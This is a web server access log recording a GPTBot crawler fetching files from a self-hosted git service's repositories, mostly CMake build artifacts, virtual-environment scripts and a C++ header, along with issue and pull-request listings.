"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:17:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12415] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:17:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22045] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11076] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:17:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 